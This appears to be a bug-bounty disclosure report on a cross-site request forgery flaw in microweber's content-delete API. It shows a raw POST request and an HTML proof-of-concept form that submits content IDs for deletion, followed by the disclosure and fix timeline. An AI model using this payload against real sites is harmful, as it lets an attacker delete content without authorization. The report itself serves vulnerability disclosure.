Cross-Site Request Forgery (CSRF) in microweber/microweber


Reported on

Jan 19th 2022


CSRF issues deleting the content of the website since it is having no CSRF token validation.


POST /demo/api/content/delete HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 12
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin


Proof of Concept

  <script>history.pushState('', '', '/')</script>
    <form action="" method="POST">
      <input type="hidden" name="ids&#91;&#93;" value="21" />
      <input type="submit" value="Submit request" />


This vulnerability is capable of enabling an attacker to delete any content without authorization.

We are processing your report and will contact the microweber team within 24 hours. 2 years ago
We have contacted a member of the microweber team and are waiting to hear back 2 years ago
We have sent a follow up to the microweber team. We will try again in 4 days. 2 years ago
We have sent a second follow up to the microweber team. We will try again in 7 days. 2 years ago
Peter Ivanov validated this vulnerability 2 years ago
shubh123-tri has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov marked this as fixed in 1.2.11 with commit 63447b 2 years ago
Peter Ivanov has been awarded the fix bounty
to join this conversation